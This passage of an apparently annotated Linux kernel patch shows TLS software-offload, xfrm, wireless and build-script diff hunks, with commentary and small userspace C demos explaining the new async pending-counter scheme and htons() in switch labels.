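        int i;

        for (i = 0; i < 63; i++)
            chain[i].nested = &chain[i + 1];

        printf("deep chain    -> %d\n", copy_actions(&chain[0], 0));
        printf("shallow chain -> %d\n", copy_actions(&chain[60], 0));
        return 0;
    }
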
+diff --git a/net/tls/tls.h b/net/tls/tls.h
+index 0672acab27731..4922668fefaa8 100644
+--- a/net/tls/tls.h
++++ b/net/tls/tls.h
+@@ -97,6 +97,7 @@ void tls_update_rx_zc_capable(struct tls_context *tls_ctx);
+ void tls_sw_strparser_arm(struct sock *sk, struct tls_context *ctx);
+ void tls_sw_strparser_done(struct tls_context *tls_ctx);
+ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size);
++void tls_sw_splice_eof(struct socket *sock);
+ int tls_sw_sendpage_locked(struct sock *sk, struct page *page,
+ 			   int offset, size_t size, int flags);
+ int tls_sw_sendpage(struct sock *sk, struct page *page,
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 338a443fa47b2..80b42a3e78830 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -922,6 +922,7 @@ static void build_proto_ops(struct proto_ops ops[TLS_NUM_CONFIG][TLS_NUM_CONFIG]
+ 	ops[TLS_BASE][TLS_BASE] = *base;
+ 
+ 	ops[TLS_SW  ][TLS_BASE] = ops[TLS_BASE][TLS_BASE];
++	ops[TLS_SW  ][TLS_BASE].splice_eof	= tls_sw_splice_eof;
+ 	ops[TLS_SW  ][TLS_BASE].sendpage_locked	= tls_sw_sendpage_locked;
+ 
+ 	ops[TLS_BASE][TLS_SW  ] = ops[TLS_BASE][TLS_BASE];
+@@ -990,6 +991,7 @@ static void build_protos(struct proto prot[TLS_NUM_CONFIG][TLS_NUM_CONFIG],
+ 
+ 	prot[TLS_SW][TLS_BASE] = prot[TLS_BASE][TLS_BASE];
+ 	prot[TLS_SW][TLS_BASE].sendmsg		= tls_sw_sendmsg;
++	prot[TLS_SW][TLS_BASE].splice_eof	= tls_sw_splice_eof;
+ 	prot[TLS_SW][TLS_BASE].sendpage		= tls_sw_sendpage;
+ 
+ 	prot[TLS_BASE][TLS_SW] = prot[TLS_BASE][TLS_BASE];
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 0323040d34bc6..c8cbdd02a784e 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -62,6 +62,7 @@ struct tls_decrypt_ctx {
+ 	u8 iv[MAX_IV_SIZE];
+ 	u8 aad[TLS_MAX_AAD_SIZE];
+ 	u8 tail;
++	bool free_sgout;
+ 	struct scatterlist sg[];
+ };
+ 
+@@ -186,7 +187,6 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 	struct aead_request *aead_req = crypto_get_completion_data(data);
+ 	struct crypto_aead *aead = crypto_aead_reqtfm(aead_req);
+ 	struct scatterlist *sgout = aead_req->dst;
+-	struct scatterlist *sgin = aead_req->src;
+ 	struct tls_sw_context_rx *ctx;
+ 	struct tls_decrypt_ctx *dctx;
+ 	struct tls_context *tls_ctx;
+@@ -212,7 +212,7 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 	}
+ 
+ 	/* Free the destination pages if skb was not decrypted inplace */
+-	if (sgout != sgin) {
++	if (dctx->free_sgout) {
+ 		/* Skip the first S/G entry as it points to AAD */
+ 		for_each_sg(sg_next(sgout), sg, UINT_MAX, pages) {
+ 			if (!sg)
+@@ -223,10 +223,17 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 
+ 	kfree(aead_req);
+ 
+-	spin_lock_bh(&ctx->decrypt_compl_lock);
+-	if (!atomic_dec_return(&ctx->decrypt_pending))
++	if (atomic_dec_and_test(&ctx->decrypt_pending))
+ 		complete(&ctx->async_wait.completion);
+-	spin_unlock_bh(&ctx->decrypt_compl_lock);
++}
++
++static int tls_decrypt_async_wait(struct tls_sw_context_rx *ctx)
++{
++	if (!atomic_dec_and_test(&ctx->decrypt_pending))
++		crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++	atomic_inc(&ctx->decrypt_pending);
++
++	return ctx->async_wait.err;
+ }
+ 
+ static int tls_do_decryption(struct sock *sk,
+@@ -252,6 +259,7 @@ static int tls_do_decryption(struct sock *sk,
+ 		aead_request_set_callback(aead_req,
+ 					  CRYPTO_TFM_REQ_MAY_BACKLOG,
+ 					  tls_decrypt_done, aead_req);
++		DEBUG_NET_WARN_ON_ONCE(atomic_read(&ctx->decrypt_pending) < 1);
+ 		atomic_inc(&ctx->decrypt_pending);
+ 	} else {
+ 		aead_request_set_callback(aead_req,
+@@ -441,7 +449,6 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 	struct tls_rec *rec;
+ 	bool ready = false;
+ 	struct sock *sk;
+-	int pending;
+ 
+ 	rec = container_of(aead_req, struct tls_rec, aead_req);
+ 	msg_en = &rec->msg_encrypted;
+@@ -481,12 +488,8 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 			ready = true;
+ 	}
+ 
+-	spin_lock_bh(&ctx->encrypt_compl_lock);
+-	pending = atomic_dec_return(&ctx->encrypt_pending);
+-
+-	if (!pending && ctx->async_notify)
++	if (atomic_dec_and_test(&ctx->encrypt_pending))
+ 		complete(&ctx->async_wait.completion);
+-	spin_unlock_bh(&ctx->encrypt_compl_lock);
+ 
+ 	if (!ready)
+ 		return;
+@@ -496,6 +499,15 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 		schedule_delayed_work(&ctx->tx_work.work, 1);
+ }
+ 
++static int tls_encrypt_async_wait(struct tls_sw_context_tx *ctx)
++{
++	if (!atomic_dec_and_test(&ctx->encrypt_pending))
++		crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++	atomic_inc(&ctx->encrypt_pending);
++
++	return ctx->async_wait.err;
++}
++
+ static int tls_do_encryption(struct sock *sk,
+ 			     struct tls_context *tls_ctx,
+ 			     struct tls_sw_context_tx *ctx,
+@@ -542,6 +554,7 @@ static int tls_do_encryption(struct sock *sk,
+ 
+ 	/* Add the record in tx_list */
+ 	list_add_tail((struct list_head *)&rec->list, &ctx->tx_list);
++	DEBUG_NET_WARN_ON_ONCE(atomic_read(&ctx->encrypt_pending) < 1);
+ 	atomic_inc(&ctx->encrypt_pending);
+ 
+ 	rc = crypto_aead_encrypt(aead_req);
+@@ -953,7 +966,6 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	int num_zc = 0;
+ 	int orig_size;
+ 	int ret = 0;
+-	int pending;
+ 
+ 	if (msg->msg_flags & ~(MSG_MORE | MSG_DONTWAIT | MSG_NOSIGNAL |
+ 			       MSG_CMSG_COMPAT))
+@@ -1122,24 +1134,12 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	if (!num_async) {
+ 		goto send_end;
+ 	} else if (num_zc) {
+-		/* Wait for pending encryptions to get completed */
+-		spin_lock_bh(&ctx->encrypt_compl_lock);
+-		ctx->async_notify = true;
+-
+-		pending = atomic_read(&ctx->encrypt_pending);
+-		spin_unlock_bh(&ctx->encrypt_compl_lock);
+-		if (pending)
+-			crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
+-		else
+-			reinit_completion(&ctx->async_wait.completion);
+-
+-		/* There can be no concurrent accesses, since we have no
+-		 * pending encrypt operations
+-		 */
+-		WRITE_ONCE(ctx->async_notify, false);
++		int err;
+ 
+-		if (ctx->async_wait.err) {
+-			ret = ctx->async_wait.err;
++		/* Wait for pending encryptions to get completed */
++		err = tls_encrypt_async_wait(ctx);
++		if (err) {
++			ret = err;
+ 			copied = 0;
+ 		}
+ 	}
+@@ -1158,6 +1158,67 @@ int tls_sw_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 	return copied > 0 ? copied : ret;
+ }
+ 
++/*
++ * Handle unexpected EOF during splice without SPLICE_F_MORE set.
++ */
++void tls_sw_splice_eof(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	struct tls_context *tls_ctx = tls_get_ctx(sk);
++	struct tls_sw_context_tx *ctx = tls_sw_ctx_tx(tls_ctx);
++	struct tls_rec *rec;
++	struct sk_msg *msg_pl;
++	ssize_t copied = 0;
++	bool retrying = false;
++	int ret = 0;
++
++	if (!ctx->open_rec)
++		return;
++
++	mutex_lock(&tls_ctx->tx_lock);
++	lock_sock(sk);
++
++retry:
++	/* same checks as in tls_sw_push_pending_record() */
++	rec = ctx->open_rec;
++	if (!rec)
++		goto unlock;
++
++	msg_pl = &rec->msg_plaintext;
++	if (msg_pl->sg.size == 0)
++		goto unlock;
++
++	/* Check the BPF advisor and perform transmission. */
++	ret = bpf_exec_tx_verdict(msg_pl, sk, false, TLS_RECORD_TYPE_DATA,
++				  &copied, 0);
++	switch (ret) {
++	case 0:
++	case -EAGAIN:
++		if (retrying)
++			goto unlock;
++		retrying = true;
++		goto retry;
++	case -EINPROGRESS:
++		break;
++	default:
++		goto unlock;
++	}
++
++	/* Wait for pending encryptions to get completed */
++	if (tls_encrypt_async_wait(ctx))
++		goto unlock;
++
++	/* Transmit if any encryptions have completed */
++	if (test_and_clear_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask)) {
++		cancel_delayed_work(&ctx->tx_work.work);
++		tls_tx_records(sk, 0);
++	}
++
++unlock:
++	release_sock(sk);
++	mutex_unlock(&tls_ctx->tx_lock);
++}
++
+ static int tls_sw_do_sendpage(struct sock *sk, struct page *page,
+ 			      int offset, size_t size, int flags)
+ {
+@@ -1595,6 +1656,7 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	} else if (out_sg) {
+ 		memcpy(sgout, out_sg, n_sgout * sizeof(*sgout));
+ 	}
++	dctx->free_sgout = !!pages;
+ 
+ 	/* Prepare and submit AEAD request */
+ 	err = tls_do_decryption(sk, sgin, sgout, dctx->iv,
+@@ -2123,16 +2185,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 
+ recv_end:
+ 	if (async) {
+-		int ret, pending;
++		int ret;
+ 
+ 		/* Wait for all previously submitted records to be decrypted */
+-		spin_lock_bh(&ctx->decrypt_compl_lock);
+-		reinit_completion(&ctx->async_wait.completion);
+-		pending = atomic_read(&ctx->decrypt_pending);
+-		spin_unlock_bh(&ctx->decrypt_compl_lock);
+-		ret = 0;
+-		if (pending)
+-			ret = crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++		ret = tls_decrypt_async_wait(ctx);
+ 		__skb_queue_purge(&ctx->async_hold);
+ 
+ 		if (ret) {
+@@ -2149,7 +2205,6 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek);
+-		decrypted += max(err, 0);
+ 	}
+ 
+ 	copied += decrypted;
+@@ -2351,16 +2406,9 @@ void tls_sw_release_resources_tx(struct sock *sk)
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+ 	struct tls_sw_context_tx *ctx = tls_sw_ctx_tx(tls_ctx);
+ 	struct tls_rec *rec, *tmp;
+-	int pending;
+ 
+ 	/* Wait for any pending async encryptions to complete */
+-	spin_lock_bh(&ctx->encrypt_compl_lock);
+-	ctx->async_notify = true;
+-	pending = atomic_read(&ctx->encrypt_pending);
+-	spin_unlock_bh(&ctx->encrypt_compl_lock);
+-
+-	if (pending)
+-		crypto_wait_req(-EINPROGRESS, &ctx->async_wait);
++	tls_encrypt_async_wait(ctx);
+ 
+ 	tls_tx_records(sk, -1);
+ 
+@@ -2513,6 +2561,48 @@ void tls_update_rx_zc_capable(struct tls_context *tls_ctx)
+ 		tls_ctx->prot_info.version != TLS_1_3_VERSION;
+ }
+ 
++static struct tls_sw_context_tx *init_ctx_tx(struct tls_context *ctx, struct sock *sk)
++{
++	struct tls_sw_context_tx *sw_ctx_tx;
++
++	if (!ctx->priv_ctx_tx) {
++		sw_ctx_tx = kzalloc(sizeof(*sw_ctx_tx), GFP_KERNEL);
++		if (!sw_ctx_tx)
++			return NULL;
++	} else {
++		sw_ctx_tx = ctx->priv_ctx_tx;
++	}
++
++	crypto_init_wait(&sw_ctx_tx->async_wait);
++	atomic_set(&sw_ctx_tx->encrypt_pending, 1);
++	INIT_LIST_HEAD(&sw_ctx_tx->tx_list);
++	INIT_DELAYED_WORK(&sw_ctx_tx->tx_work.work, tx_work_handler);
++	sw_ctx_tx->tx_work.sk = sk;
++
++	return sw_ctx_tx;
++}
++
++static struct tls_sw_context_rx *init_ctx_rx(struct tls_context *ctx)
++{
++	struct tls_sw_context_rx *sw_ctx_rx;
++
++	if (!ctx->priv_ctx_rx) {
++		sw_ctx_rx = kzalloc(sizeof(*sw_ctx_rx), GFP_KERNEL);
++		if (!sw_ctx_rx)
++			return NULL;
++	} else {
++		sw_ctx_rx = ctx->priv_ctx_rx;
++	}
++
++	crypto_init_wait(&sw_ctx_rx->async_wait);
++	atomic_set(&sw_ctx_rx->decrypt_pending, 1);
++	init_waitqueue_head(&sw_ctx_rx->wq);
++	skb_queue_head_init(&sw_ctx_rx->rx_list);
++	skb_queue_head_init(&sw_ctx_rx->async_hold);
++
++	return sw_ctx_rx;
++}
++
+ int tls_set_sw_offload(struct sock *sk, struct tls_context *ctx, int tx)
+ {
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+@@ -2534,48 +2624,22 @@ int tls_set_sw_offload(struct sock *sk, struct tls_context *ctx, int tx)
+ 	}
+ 
+ 	if (tx) {
+-		if (!ctx->priv_ctx_tx) {
+-			sw_ctx_tx = kzalloc(sizeof(*sw_ctx_tx), GFP_KERNEL);
+-			if (!sw_ctx_tx) {
+-				rc = -ENOMEM;
+-				goto out;
+-			}
+-			ctx->priv_ctx_tx = sw_ctx_tx;
+-		} else {
+-			sw_ctx_tx =
+-				(struct tls_sw_context_tx *)ctx->priv_ctx_tx;
+-		}
+-	} else {
+-		if (!ctx->priv_ctx_rx) {
+-			sw_ctx_rx = kzalloc(sizeof(*sw_ctx_rx), GFP_KERNEL);
+-			if (!sw_ctx_rx) {
+-				rc = -ENOMEM;
+-				goto out;
+-			}
+-			ctx->priv_ctx_rx = sw_ctx_rx;
+-		} else {
+-			sw_ctx_rx =
+-				(struct tls_sw_context_rx *)ctx->priv_ctx_rx;
+-		}
+-	}
++		ctx->priv_ctx_tx = init_ctx_tx(ctx, sk);
++		if (!ctx->priv_ctx_tx)
++			return -ENOMEM;
+ 
+-	if (tx) {
+-		crypto_init_wait(&sw_ctx_tx->async_wait);
+-		spin_lock_init(&sw_ctx_tx->encrypt_compl_lock);
++		sw_ctx_tx = ctx->priv_ctx_tx;
+ 		crypto_info = &ctx->crypto_send.info;
+ 		cctx = &ctx->tx;
+ 		aead = &sw_ctx_tx->aead_send;
+-		INIT_LIST_HEAD(&sw_ctx_tx->tx_list);
+-		INIT_DELAYED_WORK(&sw_ctx_tx->tx_work.work, tx_work_handler);
+-		sw_ctx_tx->tx_work.sk = sk;
+ 	} else {
+-		crypto_init_wait(&sw_ctx_rx->async_wait);
+-		spin_lock_init(&sw_ctx_rx->decrypt_compl_lock);
+-		init_waitqueue_head(&sw_ctx_rx->wq);
++		ctx->priv_ctx_rx = init_ctx_rx(ctx);
++		if (!ctx->priv_ctx_rx)
++			return -ENOMEM;
++
++		sw_ctx_rx = ctx->priv_ctx_rx;
+ 		crypto_info = &ctx->crypto_recv.info;
+ 		cctx = &ctx->rx;
+-		skb_queue_head_init(&sw_ctx_rx->rx_list);
+-		skb_queue_head_init(&sw_ctx_rx->async_hold);
+ 		aead = &sw_ctx_rx->aead_recv;
+ 	}
+ 
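
The tls_sw rework drops decrypt_compl_lock/encrypt_compl_lock and the
async_notify flag in favour of a counting scheme: the pending counter is
initialised to 1 as a baseline reference, every in-flight request takes
another, completions use atomic_dec_and_test(), and the waiter drops the
baseline, sleeps only if requests remain, then restores it for the next
round. A userspace model using C11 atomics and a condition variable
(helper names are invented):

    #include <stdio.h>
    #include <pthread.h>
    #include <stdatomic.h>

    static atomic_int pending = 1;      /* baseline reference */
    static pthread_mutex_t m = PTHREAD_MUTEX_INITIALIZER;
    static pthread_cond_t  c = PTHREAD_COND_INITIALIZER;
    static int done;

    static void complete(void)
    {
        pthread_mutex_lock(&m);
        done = 1;
        pthread_cond_signal(&c);
        pthread_mutex_unlock(&m);
    }

    static void *async_op(void *arg)
    {
        (void)arg;
        /* ... encrypt/decrypt work would happen here ... */
        if (atomic_fetch_sub(&pending, 1) == 1)  /* dec_and_test */
            complete();
        return NULL;
    }

    static void async_wait(void)
    {
        if (atomic_fetch_sub(&pending, 1) != 1) {  /* still in flight */
            pthread_mutex_lock(&m);
            while (!done)
                pthread_cond_wait(&c, &m);
            pthread_mutex_unlock(&m);
        }
        atomic_fetch_add(&pending, 1);  /* restore baseline for reuse */
    }

    int main(void)
    {
        pthread_t t;

        atomic_fetch_add(&pending, 1);  /* submit one async request */
        pthread_create(&t, NULL, async_op, NULL);
        async_wait();
        pthread_join(t, NULL);
        printf("all pending ops drained\n");
        return 0;
    }
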
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 8809e668ed912..3fcddc8687ed4 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -1671,6 +1671,7 @@ void wiphy_delayed_work_queue(struct wiphy *wiphy,
+ 			      unsigned long delay)
+ {
+ 	if (!delay) {
++		del_timer(&dwork->timer);
+ 		wiphy_work_queue(wiphy, &dwork->work);
+ 		return;
+ 	}
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index ac1a645afa8df..d0320e35accbf 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -180,6 +180,8 @@ static int xfrm4_remove_beet_encap(struct xfrm_state *x, struct sk_buff *skb)
+ 	int optlen = 0;
+ 	int err = -EINVAL;
+ 
++	skb->protocol = htons(ETH_P_IP);
++
+ 	if (unlikely(XFRM_MODE_SKB_CB(skb)->protocol == IPPROTO_BEETPH)) {
+ 		struct ip_beet_phdr *ph;
+ 		int phlen;
+@@ -232,8 +234,7 @@ static int xfrm4_remove_tunnel_encap(struct xfrm_state *x, struct sk_buff *skb)
+ {
+ 	int err = -EINVAL;
+ 
+-	if (XFRM_MODE_SKB_CB(skb)->protocol != IPPROTO_IPIP)
+-		goto out;
++	skb->protocol = htons(ETH_P_IP);
+ 
+ 	if (!pskb_may_pull(skb, sizeof(struct iphdr)))
+ 		goto out;
+@@ -270,8 +271,8 @@ static int xfrm6_remove_tunnel_encap(struct xfrm_state *x, struct sk_buff *skb)
+ {
+ 	int err = -EINVAL;
+ 
+-	if (XFRM_MODE_SKB_CB(skb)->protocol != IPPROTO_IPV6)
+-		goto out;
++	skb->protocol = htons(ETH_P_IPV6);
++
+ 	if (!pskb_may_pull(skb, sizeof(struct ipv6hdr)))
+ 		goto out;
+ 
+@@ -301,6 +302,8 @@ static int xfrm6_remove_beet_encap(struct xfrm_state *x, struct sk_buff *skb)
+ 	int size = sizeof(struct ipv6hdr);
+ 	int err;
+ 
++	skb->protocol = htons(ETH_P_IPV6);
++
+ 	err = skb_cow_head(skb, size + skb->mac_len);
+ 	if (err)
+ 		goto out;
+@@ -332,22 +335,26 @@ static int xfrm6_remove_beet_encap(struct xfrm_state *x, struct sk_buff *skb)
+  */
+ static int
+ xfrm_inner_mode_encap_remove(struct xfrm_state *x,
+-			     const struct xfrm_mode *inner_mode,
+ 			     struct sk_buff *skb)
+ {
+-	switch (inner_mode->encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+-		if (inner_mode->family == AF_INET)
++		switch (x->sel.family) {
++		case AF_INET:
+ 			return xfrm4_remove_beet_encap(x, skb);
+-		if (inner_mode->family == AF_INET6)
++		case AF_INET6:
+ 			return xfrm6_remove_beet_encap(x, skb);
++		}
+ 		break;
+ 	case XFRM_MODE_TUNNEL:
+-		if (inner_mode->family == AF_INET)
++		switch (XFRM_MODE_SKB_CB(skb)->protocol) {
++		case IPPROTO_IPIP:
+ 			return xfrm4_remove_tunnel_encap(x, skb);
+-		if (inner_mode->family == AF_INET6)
++		case IPPROTO_IPV6:
+ 			return xfrm6_remove_tunnel_encap(x, skb);
+ 		break;
++		}
++		return -EINVAL;
+ 	}
+ 
+ 	WARN_ON_ONCE(1);
+@@ -356,9 +363,7 @@ xfrm_inner_mode_encap_remove(struct xfrm_state *x,
+ 
+ static int xfrm_prepare_input(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	const struct xfrm_mode *inner_mode = &x->inner_mode;
+-
+-	switch (x->outer_mode.family) {
++	switch (x->props.family) {
+ 	case AF_INET:
+ 		xfrm4_extract_header(skb);
+ 		break;
+@@ -370,25 +375,7 @@ static int xfrm_prepare_input(struct xfrm_state *x, struct sk_buff *skb)
+ 		return -EAFNOSUPPORT;
+ 	}
+ 
+-	if (x->sel.family == AF_UNSPEC) {
+-		inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
+-		if (!inner_mode)
+-			return -EAFNOSUPPORT;
+-	}
+-
+-	switch (inner_mode->family) {
+-	case AF_INET:
+-		skb->protocol = htons(ETH_P_IP);
+-		break;
+-	case AF_INET6:
+-		skb->protocol = htons(ETH_P_IPV6);
+-		break;
+-	default:
+-		WARN_ON_ONCE(1);
+-		break;
+-	}
+-
+-	return xfrm_inner_mode_encap_remove(x, inner_mode, skb);
++	return xfrm_inner_mode_encap_remove(x, skb);
+ }
+ 
+ /* Remove encapsulation header.
+@@ -434,17 +421,16 @@ static int xfrm6_transport_input(struct xfrm_state *x, struct sk_buff *skb)
+ }
+ 
+ static int xfrm_inner_mode_input(struct xfrm_state *x,
+-				 const struct xfrm_mode *inner_mode,
+ 				 struct sk_buff *skb)
+ {
+-	switch (inner_mode->encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 	case XFRM_MODE_TUNNEL:
+ 		return xfrm_prepare_input(x, skb);
+ 	case XFRM_MODE_TRANSPORT:
+-		if (inner_mode->family == AF_INET)
++		if (x->props.family == AF_INET)
+ 			return xfrm4_transport_input(x, skb);
+-		if (inner_mode->family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_transport_input(x, skb);
+ 		break;
+ 	case XFRM_MODE_ROUTEOPTIMIZATION:
+@@ -462,7 +448,6 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ {
+ 	const struct xfrm_state_afinfo *afinfo;
+ 	struct net *net = dev_net(skb->dev);
+-	const struct xfrm_mode *inner_mode;
+ 	int err;
+ 	__be32 seq;
+ 	__be32 seq_hi;
+@@ -492,7 +477,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 			goto drop;
+ 		}
+ 
+-		family = x->outer_mode.family;
++		family = x->props.family;
+ 
+ 		/* An encap_type of -1 indicates async resumption. */
+ 		if (encap_type == -1) {
+@@ -676,17 +661,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 
+ 		XFRM_MODE_SKB_CB(skb)->protocol = nexthdr;
+ 
+-		inner_mode = &x->inner_mode;
+-
+-		if (x->sel.family == AF_UNSPEC) {
+-			inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
+-			if (inner_mode == NULL) {
+-				XFRM_INC_STATS(net, LINUX_MIB_XFRMINSTATEMODEERROR);
+-				goto drop;
+-			}
+-		}
+-
+-		if (xfrm_inner_mode_input(x, inner_mode, skb)) {
++		if (xfrm_inner_mode_input(x, skb)) {
+ 			XFRM_INC_STATS(net, LINUX_MIB_XFRMINSTATEMODEERROR);
+ 			goto drop;
+ 		}
+@@ -701,7 +676,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 		 * transport mode so the outer address is identical.
+ 		 */
+ 		daddr = &x->id.daddr;
+-		family = x->outer_mode.family;
++		family = x->props.family;
+ 
+ 		err = xfrm_parse_spi(skb, nexthdr, &spi, &seq);
+ 		if (err < 0) {
+@@ -732,7 +707,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
+ 
+ 		err = -EAFNOSUPPORT;
+ 		rcu_read_lock();
+-		afinfo = xfrm_state_afinfo_get_rcu(x->inner_mode.family);
++		afinfo = xfrm_state_afinfo_get_rcu(x->props.family);
+ 		if (likely(afinfo))
+ 			err = afinfo->transport_finish(skb, xfrm_gro || async);
+ 		rcu_read_unlock();
+diff --git a/net/xfrm/xfrm_output.c b/net/xfrm/xfrm_output.c
+index 9a5e79a38c679..07a7ee43b8ae2 100644
+--- a/net/xfrm/xfrm_output.c
++++ b/net/xfrm/xfrm_output.c
+@@ -414,7 +414,7 @@ static int xfrm4_prepare_output(struct xfrm_state *x, struct sk_buff *skb)
+ 	IPCB(skb)->flags |= IPSKB_XFRM_TUNNEL_SIZE;
+ 	skb->protocol = htons(ETH_P_IP);
+ 
+-	switch (x->outer_mode.encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 		return xfrm4_beet_encap_add(x, skb);
+ 	case XFRM_MODE_TUNNEL:
+@@ -437,7 +437,7 @@ static int xfrm6_prepare_output(struct xfrm_state *x, struct sk_buff *skb)
+ 	skb->ignore_df = 1;
+ 	skb->protocol = htons(ETH_P_IPV6);
+ 
+-	switch (x->outer_mode.encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 		return xfrm6_beet_encap_add(x, skb);
+ 	case XFRM_MODE_TUNNEL:
+@@ -453,22 +453,22 @@ static int xfrm6_prepare_output(struct xfrm_state *x, struct sk_buff *skb)
+ 
+ static int xfrm_outer_mode_output(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	switch (x->outer_mode.encap) {
++	switch (x->props.mode) {
+ 	case XFRM_MODE_BEET:
+ 	case XFRM_MODE_TUNNEL:
+-		if (x->outer_mode.family == AF_INET)
++		if (x->props.family == AF_INET)
+ 			return xfrm4_prepare_output(x, skb);
+-		if (x->outer_mode.family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_prepare_output(x, skb);
+ 		break;
+ 	case XFRM_MODE_TRANSPORT:
+-		if (x->outer_mode.family == AF_INET)
++		if (x->props.family == AF_INET)
+ 			return xfrm4_transport_output(x, skb);
+-		if (x->outer_mode.family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_transport_output(x, skb);
+ 		break;
+ 	case XFRM_MODE_ROUTEOPTIMIZATION:
+-		if (x->outer_mode.family == AF_INET6)
++		if (x->props.family == AF_INET6)
+ 			return xfrm6_ro_output(x, skb);
+ 		WARN_ON_ONCE(1);
+ 		break;
+@@ -866,21 +866,10 @@ static int xfrm6_extract_output(struct xfrm_state *x, struct sk_buff *skb)
+ 
+ static int xfrm_inner_extract_output(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	const struct xfrm_mode *inner_mode;
+-
+-	if (x->sel.family == AF_UNSPEC)
+-		inner_mode = xfrm_ip2inner_mode(x,
+-				xfrm_af2proto(skb_dst(skb)->ops->family));
+-	else
+-		inner_mode = &x->inner_mode;
+-
+-	if (inner_mode == NULL)
+-		return -EAFNOSUPPORT;
+-
+-	switch (inner_mode->family) {
+-	case AF_INET:
++	switch (skb->protocol) {
++	case htons(ETH_P_IP):
+ 		return xfrm4_extract_output(x, skb);
+-	case AF_INET6:
++	case htons(ETH_P_IPV6):
+ 		return xfrm6_extract_output(x, skb);
+ 	}
+ 
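
A side note on the style in xfrm_inner_extract_output(): the switch is
over the network-endian skb->protocol, with htons() written directly in
the case labels, which is legal because the kernel's htons() folds to an
integer constant expression. Userspace htons() carries no such
guarantee, so this demo uses a stand-in constant-folding macro:

    #include <stdio.h>
    #include <stdint.h>

    /* constant-foldable byte swap, standing in for the kernel's htons() */
    #define HTONS(x) ((uint16_t)((((x) & 0xff) << 8) | (((x) >> 8) & 0xff)))

    static const char *l3_name(uint16_t proto_be)
    {
        switch (proto_be) {
        case HTONS(0x0800): return "IPv4";  /* ETH_P_IP */
        case HTONS(0x86DD): return "IPv6";  /* ETH_P_IPV6 */
        default:            return "other";
        }
    }

    int main(void)
    {
        printf("%s %s\n", l3_name(HTONS(0x0800)), l3_name(HTONS(0x86DD)));
        return 0;
    }
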
+diff --git a/samples/bpf/asm_goto_workaround.h b/samples/bpf/asm_goto_workaround.h
+index 7048bb3594d65..634e81d83efd9 100644
+--- a/samples/bpf/asm_goto_workaround.h
++++ b/samples/bpf/asm_goto_workaround.h
+@@ -4,14 +4,14 @@
+ #define __ASM_GOTO_WORKAROUND_H
+ 
+ /*
+- * This will bring in asm_volatile_goto and asm_inline macro definitions
++ * This will bring in asm_goto_output and asm_inline macro definitions
+  * if enabled by compiler and config options.
+  */
+ #include <linux/types.h>
+ 
+-#ifdef asm_volatile_goto
+-#undef asm_volatile_goto
+-#define asm_volatile_goto(x...) asm volatile("invalid use of asm_volatile_goto")
++#ifdef asm_goto_output
++#undef asm_goto_output
++#define asm_goto_output(x...) asm volatile("invalid use of asm_goto_output")
+ #endif
+ 
+ /*
+diff --git a/scripts/Makefile.modpost b/scripts/Makefile.modpost
+index e41dee64d429c..39aea753d0bdc 100644
+--- a/scripts/Makefile.modpost
++++ b/scripts/Makefile.modpost
+@@ -44,6 +44,7 @@ modpost-args =										\
+ 	$(if $(CONFIG_SECTION_MISMATCH_WARN_ONLY),,-E)					\
+ 	$(if $(KBUILD_NSDEPS),-d $(MODULES_NSDEPS))					\
+ 	$(if $(CONFIG_MODULE_ALLOW_MISSING_NAMESPACE_IMPORTS)$(KBUILD_NSDEPS),-N)	\
